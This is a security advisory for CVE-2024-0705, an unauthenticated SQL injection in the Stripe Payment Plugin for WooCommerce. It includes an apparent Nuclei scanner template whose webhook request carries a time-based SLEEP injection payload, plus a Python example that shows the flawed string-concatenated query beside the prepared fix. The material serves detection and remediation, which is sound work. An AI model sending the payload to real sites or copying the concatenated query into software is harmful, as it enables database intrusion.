Stripe Payment Plugin for WooCommerce <= 3.7.9 - Unauthenticated SQL Injection

CVE-2024-0705
Verified

Description

Stripe Payment Plugin for WooCommerce for WordPress, in versions up to 3.7.9, contains a SQL injection vulnerability caused by insufficient escaping and a lack of query preparation on the 'id' parameter. Unauthenticated attackers can execute arbitrary SQL queries by sending a crafted 'id' parameter.

Severity

Critical

Published Date

February 6, 2026

Template Author

Shivam Kamboj

CVE-2024-0705.yaml
id: CVE-2024-0705

info:
  name: Stripe Payment Plugin for WooCommerce <= 3.7.9 - Unauthenticated SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    Stripe Payment Plugin for WooCommerce for WordPress versions up to 3.7.9 contains a sql_injection caused by insufficient escaping and lack of preparation on 'id' parameter, letting unauthenticated attackers execute arbitrary SQL queries, exploit requires sending crafted 'id' parameter.
  remediation: |
    Update to the latest version of the plugin, above 3.7.9, to fix the vulnerability.
  impact: |
    Attackers can execute arbitrary SQL queries, potentially leading to data disclosure or modification of sensitive database information.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0705
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "plugins/payment-gateway-stripe-and-woocommerce-integration/"
  tags: cve,cve2024,wp-plugin,wp,wordpress,woocommerce,stripe,sqli,unauth,time-based

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "payment-gateway-stripe")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 10s
        POST /?wc-api=wt_stripe HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"type":"charge.succeeded","data":{"object":{"id":"sqli_test' AND (SELECT 1 FROM (SELECT SLEEP(6))a)#","metadata":{"order_id":"999999"}}}}

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 6'
          - 'status_code == 200'
        condition: and
# digest: 490a00463044022016a8f39a483086cb723a70472fc1b9e9e03c54f04f39acf8999ef20f420f33140220077b732ba43da08f8f739ae6a0f28c58e4c298a92cc0b1b34cd8584a3bd31b42:922c64590222798bb761d5b6d8e72950
9.5 Severity

CVSS Metrics

References

https://nvd.nist.gov/vuln/detail/CVE-2024-0705
https://www.wordfence.com/threat-intel/vulnerabilities/id/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve

Remediation Steps

Update to the latest version of the plugin, above 3.7.9, to fix the vulnerability.
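
The root cause named in the description, an 'id' value that reaches the query without preparation, is shown here next to the prepared form. This is an added example, not the plugin's code and not part of the template. It assumes a hypothetical `charges` table and uses Python's sqlite3 as a stand-in for the WordPress MySQL database, so the concatenated query fails to parse instead of delaying; the plugin itself is PHP, where the prepared form is `$wpdb->prepare()`.

```python
import json
import sqlite3

# Constructed input: the same 'id' value the template's second request sends.
PROBE_ID = "sqli_test' AND (SELECT 1 FROM (SELECT SLEEP(6))a)#"


def webhook_body(charge_id):
    """Build a webhook body with the JSON shape used in the template."""
    return json.dumps({"type": "charge.succeeded", "data": {"object": {
        "id": charge_id, "metadata": {"order_id": "999999"}}}})


def make_db():
    """In-memory stand-in for the site database (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE charges (charge_id TEXT PRIMARY KEY, order_id TEXT)")
    db.execute("INSERT INTO charges VALUES ('ch_constructed_1', '1001')")
    return db


def lookup_concatenated(db, charge_id):
    """Flawed pattern: the id is pasted into the SQL text."""
    sql = "SELECT order_id FROM charges WHERE charge_id = '" + charge_id + "'"
    return db.execute(sql).fetchall()


def lookup_prepared(db, charge_id):
    """Corrected pattern: the id is bound as a parameter, never parsed as SQL."""
    sql = "SELECT order_id FROM charges WHERE charge_id = ?"
    return db.execute(sql, (charge_id,)).fetchall()


def classify(lookup, body):
    """Report whether data.object.id stayed data or reached the SQL parser."""
    charge_id = json.loads(body)["data"]["object"]["id"]
    try:
        rows = lookup(make_db(), charge_id)
    except sqlite3.Error:
        # The quote in the id closed the string literal; the rest was parsed as SQL.
        return "parsed-as-sql"
    return "treated-as-data:%d" % len(rows)


if __name__ == "__main__":
    for name, fn in (("concatenated", lookup_concatenated), ("prepared", lookup_prepared)):
        print(name, "probe:", classify(fn, webhook_body(PROBE_ID)))
        print(name, "legit:", classify(fn, webhook_body("ch_constructed_1")))
```

On MySQL the concatenated form would evaluate the injected subquery rather than raise an error, which is the delay the template's `duration >= 6` matcher measures.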